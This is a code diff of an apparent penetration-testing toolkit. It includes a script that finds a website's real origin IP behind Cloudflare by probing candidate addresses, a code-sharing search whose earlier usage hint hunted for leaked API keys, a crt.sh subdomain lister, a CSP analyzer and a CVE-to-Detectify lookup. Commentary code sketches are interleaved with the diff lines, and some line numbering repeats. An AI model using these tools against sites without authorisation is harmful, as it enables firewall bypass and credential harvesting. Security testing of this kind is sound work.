    199  - print( colored("[+] %d ips added" % len(j['result']['hits']), 'green') )
    200  - for i in j['result']['hits']:
    201  - t_ips.append( i['ip'] )
    202  - 
    203  -def readIPfromFile( domain, ipsrc ):
    204  - print( "[+] Reading data from file: %s" % ipsrc )
    205  - n = 0
    206  - s = 0
    207  - f = open( ipsrc, 'r' )
    208  - for ip in f:
    209  - if domain in ip:
    210  - try:
    211  - ex = 0
    212  - s = s + 1
    213  - ip = socket.gethostbyname( ip.strip() )
    214  - except Exception as e:
    215  - ex = 1
    216  - ip = ''
    217  - 
    218  - ip = ip.strip()
    219  - if ip != '' and not ip in t_ips:
    220  - n = n + 1
    221  - t_ips.append( ip )
    222  - print( colored("[+] %d subdomains found, %d ips added" % (s,n), 'green') )
    223  - 
    224  - 
    225  -# def is_cloudflare( ip ):
    226  -# for r in r_cloudflare:
    227  -# ipn = IPNetwork( r )
    228  -# if ip in list(ipn):
    229  -# return 1
    230  -# return 0
    231  - 
    232  -def is_cloudflare2( ip ):
    233  - ip = IP2Int( str(ip) )
    234  - for r in r_cloudflare2:
    235  - if ip >= r[0] and ip <= r[1]:
    236  - return 1
    237  - return 0
    238  - 
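With the precomputed bounds, classifying an IP is a linear scan over fourteen ranges. A self-contained sketch using two of the `r_cloudflare2` entries (the subset is for illustration only):

```python
# Two of the fourteen r_cloudflare2 ranges, for illustration only.
RANGES = [[1729491968, 1729492991], [3324608512, 3324641279]]

def ip_to_int(ip):
    # Dotted quad to 32-bit integer via bit shifts.
    o = list(map(int, ip.split('.')))
    return (o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]

def is_cloudflare_ip(ip):
    # True when the address falls inside any of the known ranges.
    n = ip_to_int(ip)
    return any(lo <= n <= hi for lo, hi in RANGES)
```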
    239  - 
    240  -# def testBypass( r_reference, ip, host ):
    241  -# u = 'https://' + ip
    242  -# headers = {"Host":host}
    243  -# try:
    244  -# ex = 0
    245  -# r = requests.get( u, headers=headers, timeout=REQUEST_TIMEOUT, verify=False )
    246  -# except Exception as e:
    247  -# ex = 1
    248  -# print( colored("[-] %s: %s" % (ip,e), 'red') )
    249  -# if ex == 0:
    250  -# if not 'Content-Type' in r.headers:
    251  -# r.headers['Content-Type'] = ''
    252  -# score = responseCompare( r_reference, r )
    253  -# if score['average'] > GOOD_CANDIDATE_SCORE:
    254  -# sys.stdout.write( colored("%s" % ip, 'green') )
    255  -# sys.stdout.write( " is a GOOD candidate with an average similarity of %d%%\n" % score['average'] )
    256  -# else:
    257  -# sys.stdout.write( "%s" % ip )
    258  -# sys.stdout.write( " is not a good candidate with an average similarity of %d%%\n" % score['average'] )
    259  -# print( colored("Status=%d (%d%%), Length=%d (%d%%), Headers=%d (%d%%), Content-Type=%s (%d%%)" % (r.status_code,score['dist_status_code'],len(r.content),score['dist_content'],len(r.headers),score['dist_headers'],r.headers['Content-Type'],score['dist_content_type']), 'white') )
    260  - 
    261  - 
    262  -# def testBypass2( t_multiproc, r_reference, host, ip ):
    263  -# sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    264  -# t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    265  - 
    266  -# u = 'https://' + ip
    267  -# headers = {"Host":host}
    268  -# headers.update( t_headers )
    269  - 
    270  -# try:
    271  -# r = requests.get( u, headers=headers, timeout=REQUEST_TIMEOUT, verify=False )
    272  -# except Exception as e:
    273  -# print( colored("[-] %s: %s" % (ip,e), 'red') )
    274  -# return
    275  - 
    276  -# if not 'Content-Type' in r.headers:
    277  -# r.headers['Content-Type'] = ''
    278  - 
    279  -# score = responseCompare( r_reference, r )
    280  - 
    281  -# if score['average'] > GOOD_CANDIDATE_SCORE:
    282  -# if is_cloudflare2( IPAddress(ip) ):
    283  -# sys.stdout.write( colored("%s" % ip, 'yellow') )
    284  -# sys.stdout.write( " is CloudFlare\n" )
    285  -# else:
    286  -# sys.stdout.write( colored("%s" % ip, 'green') )
    287  -# sys.stdout.write( " is a GOOD candidate with an average similarity of %d%%\n" % score['average'] )
    288  -# else:
    289  -# sys.stdout.write( "%s" % ip )
    290  -# sys.stdout.write( " is not a good candidate with an average similarity of %d%%\n" % score['average'] )
    291  - 
    292  -# print( colored("Status=%d (%d%%), Length=%d (%d%%), Headers=%d (%d%%), Content-Type=%s (%d%%)" % (r.status_code,score['dist_status_code'],len(r.content),score['dist_content'],len(r.headers),score['dist_headers'],r.headers['Content-Type'],score['dist_content_type']), 'white') )
    293  - 
    294  - 
    295  -def testBypass3( t_multiproc, r_reference, host, ip ):
    296  - sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    297  - t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    298  - 
    299  - if is_cloudflare2( IPAddress(ip) ):
    300  - sys.stdout.write( colored("%s" % ip, 'yellow') )
    301  - sys.stdout.write( " is CloudFlare\n" )
    302  - return
    303  - 
    304  - u = 'https://' + ip
    305  - headers = {"Host":host}
    306  - headers.update( t_headers )
    307  - 
    308  - try:
    309  - r = requests.get( u, headers=headers, timeout=REQUEST_TIMEOUT, verify=False )
    310  - except Exception as e:
    311  - print( colored("[-] %s: %s" % (ip,e), 'red') )
    312  - return
    313  - 
    314  - if not 'Content-Type' in r.headers:
    315  - r.headers['Content-Type'] = ''
    316  - 
    317  - score = responseCompare( r_reference, r )
    318  - 
    319  - if score['average'] > GOOD_CANDIDATE_SCORE:
    320  - sys.stdout.write( colored("%s" % ip, 'green') )
    321  - sys.stdout.write( " is a GOOD candidate with an average similarity of %d%%\n" % score['average'] )
    322  - else:
    323  - sys.stdout.write( "%s" % ip )
    324  - sys.stdout.write( " is not a good candidate with an average similarity of %d%%\n" % score['average'] )
    325  - 
    326  - print( colored("Status=%d (%d%%), Length=%d (%d%%), Headers=%d (%d%%), Content-Type=%s (%d%%)" % (r.status_code,score['dist_status_code'],len(r.content),score['dist_content'],len(r.headers),score['dist_headers'],r.headers['Content-Type'],score['dist_content_type']), 'white') )
    327  - 
    328  - 
    329  -def responseCompare( r_reference, r ):
    330  - score = {
    331  - 'dist_status_code': 0,
    332  - 'dist_content_type': 0,
    333  - 'dist_content': 0,
    334  - 'dist_headers': 0,
    335  - 'average': 0
    336  - }
    337  - 
    338  - if r.status_code == r_reference.status_code:
    339  - score['status_code'] = 'OK'
    340  - score['dist_status_code'] = 100
    341  - else:
    342  - score['status_code'] = 'NOK'
    343  - score['dist_status_code'] = 0
    344  - 
    345  - dist = levenshtein( r.headers['Content-Type'], r_reference.headers['Content-Type'] )
    346  - score['dist_content_type'] = 100 - ( dist*100 / max(len(r_reference.headers['Content-Type']),1) )
    347  - 
    348  - dist = levenshtein( r.content[0:COMPARE_FIRST_CHARS], r_reference.content[0:COMPARE_FIRST_CHARS] )
    349  - score['dist_content'] = 100 - ( dist*100 / len(r_reference.content[0:COMPARE_FIRST_CHARS]) )
    350  - # score['content_dist'] = dist
    351  - 
    352  - s_headers = ''
    353  - s_reference_headers = ''
    354  - t_sorted_keys = sorted( r_reference.headers )
    355  - 
    356  - for k in t_sorted_keys:
    357  - if not k in t_exclude_headers:
    358  - s_reference_headers = s_reference_headers + k + '=' + r_reference.headers[k] + ';;'
    359  - if k in r.headers:
    360  - s_headers = s_headers + k + '=' + r.headers[k] + ';;'
    361  - else:
    362  - s_headers = s_headers + k + '=;;'
    363  - 
    364  - # print( s_reference_headers )
    365  - # print( s_headers )
    366  - dist = levenshtein( s_headers, s_reference_headers )
    367  - score['dist_headers'] = 100 - ( dist*100 / len(s_reference_headers) )
    368  - 
    369  - score['average'] = score['dist_status_code'] + score['dist_content_type'] + score['dist_content'] + score['dist_headers']
    370  - score['average'] = score['average'] / 4
    371  - 
    372  - return score
    373  - 
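Each field score in `responseCompare` is the Levenshtein distance rescaled into a similarity percentage against the reference length; the arithmetic in isolation:

```python
def similarity(dist, ref_len):
    # 100% when the strings match (dist == 0); 0% when every
    # character of the reference differs (dist == ref_len).
    return 100 - (dist * 100 / ref_len)
```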
    374  - 
    375  -if not url.startswith( 'http' ):
    376  - url = 'https://'+url
    377  -t_url_parse = parse.urlparse( url )
    378  -# t_url_parse = urlparse( url )
    379  -t_host_parse = tldextract.extract( t_url_parse.netloc )
    380  -domain = host = t_host_parse.domain + '.' + t_host_parse.suffix
    381  -if len(t_host_parse.subdomain):
    382  - host = t_host_parse.subdomain + '.' + host
    383  -# print( t_url_parse )
    384  -# print( t_host_parse )
    385  - 
    386  -t_ips = []
    387  -t_subs = []
    388  - 
    389  -for s in t_sources:
    390  - if s != 'crtsh' and s!= 'censys':
    391  - if not os.path.isfile( s ):
    392  - print( colored("[-] source file not found: %s" % s, 'red') )
    393  - else:
    394  - readIPfromFile( domain, s )
    395  - 
    396  -if 'crtsh' in t_sources:
    397  - grabSubs( domain )
    398  - 
    399  -if 'censys' in t_sources:
    400  - grabIPfromCensys( domain )
    401  - 
    402  -t_ips = set( t_ips )
    403  -t_ips_cloudflare = []
    404  -t_ips_notcloudflare = []
    405  -t_headers = {
    406  - 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0',
    407  -}
    408  - 
    409  -print( "[+] %d unique ips collected" % len(t_ips) )
    410  - 
    411  -if len(t_ips) == 0:
    412  - exit()
    413  - 
    414  -print( "[+] Performing reference request..." )
    415  -try:
    416  - r_reference = requests.get( url, timeout=REQUEST_TIMEOUT, verify=False, headers=t_headers )
    417  - if not 'Content-Type' in r_reference.headers:
    418  - r_reference.headers['Content-Type'] = ''
    419  -except Exception as e:
    420  - print( colored("[-] error occurred: %s" % e, 'red') )
    421  - exit()
    422  - 
    423  -print( colored("Status=%d, Length=%d, Headers=%d, Content-Type=%s" % (r_reference.status_code,len(r_reference.content),len(r_reference.headers),r_reference.headers['Content-Type']), 'cyan') )
    424  -print( "[+] Testing bypass..." )
    425  - 
    426  - 
    427  - 
    428  -###################################### VERSION 3 ######################################
    429  - 
    430  -t_multiproc = {
    431  - 'n_current': 0,
    432  - 'n_total': len(t_ips)
    433  -}
    434  - 
    435  -pool = Pool( MAX_THREADS )
    436  -pool.map( partial(testBypass3,t_multiproc,r_reference,host), t_ips )
    437  -pool.close()
    438  -pool.join()
    439  - 
    440  -exit()
    441  - 
    442  - 
    443  -###################################### VERSION 2 ######################################
    444  - 
    445  -for ip in set(t_ips):
    446  - if is_cloudflare2( IPAddress(ip) ):
    447  - t_ips_cloudflare.append( ip )
    448  - print( colored("%s" % ip, 'red') )
    449  - else:
    450  - t_ips_notcloudflare.append( ip )
    451  - testBypass( r_reference, ip, host )
    452  - 
    453  -exit()
    454  - 
    455  - 
    456  -###################################### SLOW OLD VERSION ######################################
    457  - 
    458  -print( "[+] Checking Cloudflare... (cpu killer)" )
    459  - 
    460  -for ip in set(t_ips):
    461  - if is_cloudflare2( IPAddress(ip) ):
    462  - t_ips_cloudflare.append( ip )
    463  - print( colored("%s" % ip, 'white') )
    464  - else:
    465  - t_ips_notcloudflare.append( ip )
    466  - print( "%s" % ip )
    467  - 
    468  -print( colored("[*] %d Cloudflare ips detected" % len(t_ips_cloudflare), 'white') )
    469  -# for ip in t_ips_cloudflare:
    470  -# print( colored(ip,'white') )
    471  -print( colored("[+] %d ips not Cloudflare" % len(t_ips_notcloudflare), 'green') )
    472  -# for ip in t_ips_notcloudflare:
    473  -# print( ip )
    474  - 
    475  -if TEST_BYPASS:
    476  - print( "[+] Performing reference request..." )
    477  - try:
    478  - r_reference = requests.get( url, timeout=3, verify=False )
    479  - if not 'Content-Type' in r_reference.headers:
    480  - r_reference.headers['Content-Type'] = ''
    481  - except Exception as e:
    482  - print( colored("[-] error occurred: %s" % e, 'red') )
    483  - exit()
    484  - print( colored("Status=%d, Length=%d, Headers=%d, Content-Type=%s" % (r_reference.status_code,len(r_reference.content),len(r_reference.headers),r_reference.headers['Content-Type']), 'cyan') )
    485  - print( "[+] Testing bypass..." )
    486  - t_threads = []
    487  - for ip in t_ips_notcloudflare:
    488  - testBypass( r_reference, ip, host )
    489  - 
  • ■ ■ ■ ■
    codeshare.php
    skipped 194 lines
    195 195   echo "Options:\n";
    196 196   echo "\t-s\tstring to search\n";
    197 197   echo "\t-t\tthreads, default 10\n";
    198  - echo "\nRecommended: php codeshare.php -s api_key -t 50";
     198 + echo "\nRecommended: php codeshare.php -s 'tesla.com' -t 50";
    199 199   echo "\n";
    200 200   if( $err ) {
    201 201   echo 'Error: '.$err."!\n";
    skipped 4 lines
  • ■ ■ ■ ■ ■ ■
    cors.py
    1 1  #!/usr/bin/python3
    2 2   
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6 3  import os
    7 4  import sys
    8 5  import re
    skipped 314 lines
  • ■ ■ ■ ■ ■ ■
    crlf.py
    1 1  #!/usr/bin/python3
    2 2   
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6 3  import os
    7 4  import sys
    8 5  import re
    skipped 502 lines
  • ■ ■ ■ ■ ■ ■
    crtsh.php
    1 1  #!/usr/bin/php
    2 2  <?php
    3 3   
    4  -function isSubdomain( $str )
    5  -{
    6  - $str = strtolower( $str );
     4 +// function isSubdomain( $str )
     5 +// {
     6 +// $str = strtolower( $str );
    7 7   
    8  - if( preg_match('/[^0-9a-z_\-\.]/',$str) || preg_match('/[^0-9a-z]/',$str[0]) || preg_match('/[^a-z]/',$str[strlen($str)-1]) || substr_count($str,'.')<2 ) {
    9  - return false;
    10  - } else {
    11  - return true;
    12  - }
    13  -}
     8 +// if( preg_match('/[^0-9a-z_\-\.]/',$str) || preg_match('/[^0-9a-z]/',$str[0]) || preg_match('/[^a-z]/',$str[strlen($str)-1]) || substr_count($str,'.')<2 ) {
     9 +// return false;
     10 +// } else {
     11 +// return true;
     12 +// }
     13 +// }
    14 14   
    15 15   
    16  -function extractDomain( $host )
    17  -{
    18  - $tmp = explode( '.', $host );
    19  - $cnt = count( $tmp );
     16 +// function extractDomain( $host )
     17 +// {
     18 +// $tmp = explode( '.', $host );
     19 +// $cnt = count( $tmp );
    20 20   
    21  - $domain = $tmp[$cnt-1];
     21 +// $domain = $tmp[$cnt-1];
    22 22   
    23  - for( $i=$cnt-2 ; $i>=0 ; $i-- ) {
    24  - $domain = $tmp[$i].'.'.$domain;
    25  - if( strlen($tmp[$i]) > 3 ) {
    26  - break;
    27  - }
    28  - }
     23 +// for( $i=$cnt-2 ; $i>=0 ; $i-- ) {
     24 +// $domain = $tmp[$i].'.'.$domain;
     25 +// if( strlen($tmp[$i]) > 3 ) {
     26 +// break;
     27 +// }
     28 +// }
    29 29   
    30  - return $domain;
    31  -}
     30 +// return $domain;
     31 +// }
    32 32   
    33 33   
    34 34  function usage( $err=null ) {
    skipped 10 lines
    45 45   
    46 46  $t_host = [];
    47 47  $domain = $_SERVER['argv'][1];
    48  -$src = 'https://crt.sh/?q=%25.'.$domain;
    49  -$html = file_get_contents( $src );
    50  -//echo $html;
    51  - 
    52  -$doc = new DOMDocument();
    53  -$doc->preserveWhiteSpace = false;
    54  -@$doc->loadHTML( $html );
     48 +$src = 'https://crt.sh/?output=json&q=%25.'.$domain;
     49 +$json = file_get_contents( $src );
      50 +$t_json = json_decode( $json, true );
      51 +if( !is_array($t_json) ) {
      52 + exit( "Error: invalid response from crt.sh\n" );
      53 +}
     53 +// var_dump($t_json);
    55 54   
    56  -$xpath = new DOMXPath( $doc );
    57  -$table = $xpath->query( '//table' );
    58  -//var_dump($table->length);
     55 +$t_subs = [];
     56 +foreach( $t_json as $sub ) {
     57 + if( isset($sub['name_value']) && !in_array($sub['name_value'],$t_subs)) {
     58 + $t_subs[] = $sub['name_value'];
     59 + }
     60 +}
    59 61   
    60  -if( $table->length >= 3 )
    61  -{
    62  - $row = $xpath->query( 'tr', $table[2] );
    63  - //var_dump( $row->length );
     62 +sort($t_subs);
    64 63   
    65  - foreach( $row as $r ) {
    66  - $column = $xpath->query( 'td', $r );
    67  - //var_dump( $column->length );
    68  - if( $column->length == 6 ) {
    69  - $h = str_replace( '*.', '', trim($column[4]->nodeValue) );
    70  - if( isSubdomain($h) && extractDomain($h) == $domain ) {
    71  - $t_host[] = $h;
    72  - }
    73  - }
    74  - }
     64 +foreach( $t_subs as $s ) {
     65 + echo $s."\n";
    75 66  }
    76 67   
    77  -if( count($t_host) )
    78  -{
    79  - $t_host = array_unique( $t_host );
    80  - sort( $t_host );
     68 +exit();
    81 69   
    82  - foreach( $t_host as $h ) {
    83  - echo $h."\n";
    84  - }
    85  -}
     70 +// $doc = new DOMDocument();
     71 +// $doc->preserveWhiteSpace = false;
     72 +// @$doc->loadHTML( $html );
    86 73   
    87  -exit( 0 );
     74 +// $xpath = new DOMXPath( $doc );
     75 +// $table = $xpath->query( '//table' );
     76 +// //var_dump($table->length);
     77 + 
     78 +// if( $table->length >= 3 )
     79 +// {
     80 +// $row = $xpath->query( 'tr', $table[2] );
     81 +// //var_dump( $row->length );
     82 + 
     83 +// foreach( $row as $r ) {
     84 +// $column = $xpath->query( 'td', $r );
     85 +// //var_dump( $column->length );
     86 +// if( $column->length == 6 ) {
     87 +// $h = str_replace( '*.', '', trim($column[4]->nodeValue) );
     88 +// if( isSubdomain($h) && extractDomain($h) == $domain ) {
     89 +// $t_host[] = $h;
     90 +// }
     91 +// }
     92 +// }
     93 +// }
     94 + 
     95 +// if( count($t_host) )
     96 +// {
     97 +// $t_host = array_unique( $t_host );
     98 +// sort( $t_host );
     99 + 
     100 +// foreach( $t_host as $h ) {
     101 +// echo $h."\n";
     102 +// }
     103 +// }
     104 + 
     105 +// exit( 0 );
    88 106   
    89 107  ?>
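The commit's switch to the crt.sh JSON endpoint is easy to mirror outside PHP; below is a minimal Python sketch of the same fetch-and-dedup step. Function names are my additions, and the newline-splitting of `name_value` is an assumption about crt.sh's JSON, which can pack several hostnames into that one field.

```python
import json
import urllib.request

def parse_crtsh(entries):
    """Deduplicate and sort the name_value fields of crt.sh JSON entries."""
    subs = set()
    for e in entries:
        # a single certificate entry can list several newline-separated names
        for name in e.get("name_value", "").splitlines():
            subs.add(name.lstrip("*."))  # drop wildcard prefixes
    return sorted(subs)

def crtsh_subdomains(domain):
    """Fetch https://crt.sh/?output=json&q=%25.<domain> and parse it."""
    url = "https://crt.sh/?output=json&q=%25." + domain
    with urllib.request.urlopen(url) as r:
        return parse_crtsh(json.load(r))
```

Keeping the parsing separate from the HTTP call makes the interesting part testable without hitting crt.sh.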
    csp-analyzer.py
    1  -#!/usr/bin/python3
    2  - 
    3  -import sys
    4  -import requests
    5  -import urllib.parse
    6  -from colored import fg, bg, attr
    7  - 
    8  -import tldextract
    9  - 
    10  - 
    11  -def banner():
    12  - print("""
    13  - _
    14  - ___ ___ _ __ __ _ _ __ __ _| |_ _ _______ _ __ _ __ _ _
    15  - / __/ __| '_ \ / _` | '_ \ / _` | | | | |_ / _ \ '__| | '_ \| | | |
    16  - | (__\__ \ |_) | | (_| | | | | (_| | | |_| |/ / __/ | _ | |_) | |_| |
    17  - \___|___/ .__/ \__,_|_| |_|\__,_|_|\__, /___\___|_| (_) | .__/ \__, |
    18  - |_| |___/ |_| |___/
    19  - 
    20  - by @gwendallecoguic
    21  - 
    22  -""")
    23  - pass
    24  - 
    25  -banner()
    26  - 
    27  - 
    28  -# Sources:
    29  -# https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
    30  -# https://content-security-policy.com/
    31  - 
    32  -t_help = {
    33  - "child-src": "Defines the valid sources for web workers and nested browsing contexts loaded using elements such as <frame> and <iframe>.",
    34  - "connect-src": "Restricts the URLs which can be loaded using script interfaces",
    35  - "default-src": "Serves as a fallback for the other fetch directives.",
    36  - "font-src": "Specifies valid sources for fonts loaded using @font-face.",
    37  - "frame-src": "Specifies valid sources for nested browsing contexts loading using elements such as <frame> and <iframe>.",
    38  - "img-src": "Specifies valid sources of images and favicons.",
    39  - "manifest-src": "Specifies valid sources of application manifest files.",
    40  - "media-src": "Specifies valid sources for loading media using the <audio> , <video> and <track> elements.",
    41  - "object-src": "Specifies valid sources for the <object>, <embed>, and <applet> elements.",
    42  - "prefetch-src": "Specifies valid sources to be prefetched or prerendered.",
    43  - "script-src": "Specifies valid sources for JavaScript.",
    44  - "style-src": "Specifies valid sources for stylesheets.",
    45  - "webrtc-src": "Specifies valid sources for WebRTC connections.",
    46  - "worker-src": "Specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts.",
    47  - 
    48  - "base-uri": "Restricts the URLs which can be used in a document's <base> element.",
    49  - "plugin-types": "Restricts the set of plugins that can be embedded into a document by limiting the types of resources which can be loaded.",
    50  - "sandbox": "Enables a sandbox for the requested resource similar to the <iframe> sandbox attribute.",
    51  - "disown-opener": "Ensures a resource will disown its opener when navigated to.",
    52  - 
    53  - "form-action": "Restricts the URLs which can be used as the target of a form submissions from a given context.",
    54  - "frame-ancestors": "Specifies valid parents that may embed a page using <frame>, <iframe>, <object>, <embed>, or <applet>.",
    55  - "navigate-to": "Restricts the URLs to which a document can navigate by any means (a, form, window.location, window.open, etc.)",
    56  - 
    57  - "report-uri": "Instructs the user agent to report attempts to violate the Content Security Policy. These violation reports consist of JSON documents sent via an HTTP POST request to the specified URI.",
    58  - "report-to": "Fires a SecurityPolicyViolationEvent.",
    59  - 
    60  - "block-all-mixed-content": "Prevents loading any assets using HTTP when the page is loaded using HTTPS.",
    61  - "referrer": "Used to specify information in the referer (sic) header for links away from a page. Use the Referrer-Policy header instead.",
    62  - "require-sri-for": "Requires the use of SRI for scripts or styles on the page.",
    63  - "upgrade-insecure-requests": "Instructs user agents to treat all of a site's insecure URLs (those served over HTTP) as though they have been replaced with secure URLs (those served over HTTPS). This directive is intended for web sites with large numbers of insecure legacy URLs that need to be rewritten.",
    64  - 
    65  - "*": {"t":"Wildcard, allows any URL except data: blob: filesystem: schemes.","c":"red"},
    66  - "'none'": {"t":"Prevents loading resources from any source.","c":"green"},
    67  - "'self'": {"t":"Allows loading resources from the same origin (same scheme, host and port).","c":"green"},
    68  - "data:": {"t":"Allows loading resources via the data scheme (eg Base64 encoded images).","c":"yellow"},
    69  - "blob:": {"t":"Allows loading resources via the blob scheme (eg Base64 encoded images).","c":"yellow"},
    70  - "domain.example.com": {"t":"Allows loading resources from the specified domain name.","c":"green"},
    71  - "*.example.com": {"t":"Allows loading resources from any subdomain under example.com.","c":"green"},
    72  - "https://cdn.com": {"t":"Allows loading resources only over HTTPS matching the given domain.","c":"green"},
    73  - "https:": {"t":"Allows loading resources only over HTTPS on any domain.","c":"green"},
    74  - "'unsafe-inline'": {"t":"Allows use of inline source elements such as style attribute, onclick, or script tag bodies (depends on the context of the source it is applied to) and javascript: URIs.","c":"red"},
    75  - "'unsafe-eval'": {"t":"Allows unsafe dynamic code evaluation such as JavaScript eval()","c":"red"},
    76  - "'nonce-'": {"t":"Allows script or style tag to execute if the nonce attribute value matches the header value. Note that 'unsafe-inline' is ignored if either a hash or nonce value is present in the source list.","c":"green"},
    77  - "'sha256-'": {"t":"Allow a specific script or style to execute if it matches the hash. Doesn't work for javascript: URIs. Note that 'unsafe-inline' is ignored if either a hash or nonce value is present in the source list.","c":"green"},
    78  -}
    79  - 
    80  -t_warning_level = {
    81  - 0: 'white',
    82  - 1: 'cyan',
    83  - 2: 'green',
    84  - 3: 'yellow',
    85  - 4: 'dark_orange',
    86  - 5: 'red',
    87  -}
    88  - 
    89  - 
    90  -def usage( err='' ):
    91  - print( "Usage: %s <url> [<cookies>]" % sys.argv[0] )
    92  - if err:
    93  - print( "Error: %s!" % err )
    94  - sys.exit()
    95  - 
    96  - 
    97  -if len(sys.argv) < 2:
    98  - usage( 'url not found' )
    99  -if len(sys.argv) > 3:
    100  - usage()
    101  - 
    102  -url = sys.argv[1]
    103  -if len(sys.argv) > 2:
    104  - # cookies = sys.argv[2]
    105  - t_cookies = {}
    106  - for c in sys.argv[2].split(';'):
    107  - c = c.strip()
    108  - if len(c):
    109  - i = c.index('=')
    110  - k = c[0:i]
    111  - v = c[i+1:]
    112  - # print(c.index('='))
    113  - # print(k)
    114  - # print(v)
    115  - t_cookies[k] = v
    116  -else:
    117  - t_cookies = {}
    118  -# print(t_cookies)
    119  - 
    120  -if not url.startswith('http'):
    121  - url = 'https://' + url
    122  - 
    123  -# exit()
    124  -print("Calling %s..." % url )
    125  -# r = requests.get( url )
    126  -r = requests.get(url, cookies=t_cookies, allow_redirects=False, headers={'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0'})
    127  -# print(r.headers)
    128  -# print(r.text)
    129  - 
    130  -if 'Content-Security-Policy' not in r.headers:
    131  - usage( 'Content-Security-Policy not found' )
    132  - 
    133  -#print("%s" % r.headers['Content-Security-Policy'] )
    134  -t_csp = r.headers['Content-Security-Policy'].split( ';' )
    135  -#print(" %s" % t_csp )
    136  -print("")
    137  - 
    138  -t_parse_orig = urllib.parse.urlparse( url )
    139  -t_tld_orig = tldextract.extract( t_parse_orig.netloc )
    140  -# print( t_parse_orig )
    141  - 
    142  - 
    143  -def getWarningLevel( t_tld_orig, item ):
    144  - w_level = 0
    145  - 
    146  - if item in t_help:
    147  - return 0
    148  - 
    149  - if not item.startswith('http'):
    150  - item = 'https://'+item
    151  - 
    152  - tmp_parse = urllib.parse.urlparse( item )
    153  - tmp_tld = tldextract.extract( tmp_parse.netloc )
    154  - # print(tmp_parse)
    155  - 
    156  - if tmp_tld.subdomain == t_tld_orig.subdomain and tmp_tld.domain == t_tld_orig.domain and tmp_tld.suffix == t_tld_orig.suffix:
    157  - # same subdomain and domain and tld
    158  - w_level = 1
    159  - elif tmp_tld.domain == t_tld_orig.domain and tmp_tld.suffix == t_tld_orig.suffix:
    160  - # same domain and tld
    161  - w_level = 2
    162  - elif tmp_tld.domain == t_tld_orig.domain:
    163  - # same domain name
    164  - w_level = 3
    165  - else:
    166  - # nothing in common
    167  - w_level = 4
    168  - 
    169  - if '*' in tmp_parse.netloc:
    170  - # it's a wildcard!
    171  - w_level+=1
    172  - 
    173  - return w_level
    174  - 
    175  - 
    176  -for csp in t_csp:
    177  - csp = csp.strip()
    178  - if not len(csp):
    179  - continue
    180  - tmp = csp.split( ' ' )
    181  - policy = tmp.pop( 0 )
    182  - if policy:
    183  - if not len(policy):
    184  - continue
    185  - #sys.stdout.write( " " )
    186  - sys.stdout.write("%s%s%s%s" % (fg('cyan'),attr('reverse'),policy,attr(0)) )
    187  - # sys.stdout.write( colored( "%s" % policy, 'cyan', attrs=['reverse'] ) )
    188  - if policy in t_help:
    189  - sys.stdout.write(" %s[%s]%s" % (fg('light_gray'),t_help[policy],attr(0)))
    190  - # sys.stdout.write( colored( " [%s]" % t_help[policy], 'white' ) )
    191  - sys.stdout.write( "\n" )
    192  - for item in tmp:
    193  - if not len(item):
    194  - continue
    195  - orig_item = item
    196  - if item.startswith("'nonce-"):
    197  - item = "'nonce-'"
    198  - elif item.startswith("'sha256-"):
    199  - item = "'sha256-'"
    200  - if item in t_help:
    201  - color = t_help[item]['c']
    202  - else:
    203  - w_level = getWarningLevel( t_tld_orig, item )
    204  - color = t_warning_level[w_level]
    205  - if color == 'white':
    206  - sys.stdout.write( " + " )
    207  - else:
    208  - sys.stdout.write(" %s + %s" % (fg(color),attr(0)) )
    209  - # sys.stdout.write( colored( " + ", color ) )
    210  - sys.stdout.write( "%s" % orig_item )
    211  - if item in t_help:
    212  - sys.stdout.write( " %s[%s]%s" % (fg(color),t_help[item]['t'],attr(0)) )
    213  - # sys.stdout.write( colored( " [%s]" % t_help[item]['t'], color ) )
    214  - sys.stdout.write( "\n" )
    215  - sys.stdout.write( "\n" )
    216  - 
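The core of `getWarningLevel()` above is a proximity check between a CSP source and the page's own host. A stripped-down, stdlib-only sketch of the same idea follows; the real script uses `tldextract` for proper public-suffix handling, so the two-label comparison here is a naive stand-in that misjudges suffixes like `.co.uk`.

```python
from urllib.parse import urlparse

def warning_level(origin_host, source):
    """Higher level = more foreign CSP source. Naive sketch of the
    script's logic: compares the last two dot-separated labels
    instead of using tldextract."""
    if not source.startswith("http"):
        source = "https://" + source
    host = urlparse(source).netloc
    if host == origin_host:
        level = 1          # exact same host
    elif host.split(".")[-2:] == origin_host.split(".")[-2:]:
        level = 2          # same (naively computed) registered domain
    else:
        level = 4          # nothing in common
    if "*" in host:
        level += 1         # wildcards widen the allowed set further
    return level
```

The level then indexes the color table (`white` through `red`) exactly as in the script.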
    detectify-modules.py
    1  -#
    2  -# Get CVE list:
    3  -# wget https://cve.mitre.org/data/downloads/allitems.csv
    4  -#
    5  -# Get Detectify modules list:
    6  -# 1/ login on Detectify
    7  -# 2/ Perform the following request:
    8  -# POST /ajax/application_load/50bdd32f114d2e889f29f31e3e79a1ac/
    9  -# with body: navigation[mode]=modules
    10  -# 3/ save the json returned in detectify-modules.json
    11  -#
    12  - 
    13  -import sys
    14  -import json
    15  -import csv
    16  -import re
    17  -import argparse
    18  -from termcolor import colored
    19  - 
    20  -parser = argparse.ArgumentParser()
    21  -parser.add_argument("-s","--search",help="search a specific keyword")
    22  -parser.add_argument("-l","--limit",help="display only n first results")
    23  -parser.add_argument("-d","--detectify",help="display only when a Detectify module is available", action="store_true")
    24  -parser.parse_args()
    25  -args = parser.parse_args()
    26  - 
    27  -if args.search:
    28  - search = args.search
    29  -else:
    30  - search = ''
    31  - 
    32  -if args.limit:
    33  - limit = int(args.limit)
    34  -else:
    35  - limit = 0
    36  - 
    37  -if args.detectify:
    38  - detectify = 1
    39  -else:
    40  - detectify = 0
    41  - 
    42  -def search_module( cve, search, detectify ):
    43  - if search == '' or search.lower() in cve[2].lower():
    44  - for mod in t_modules:
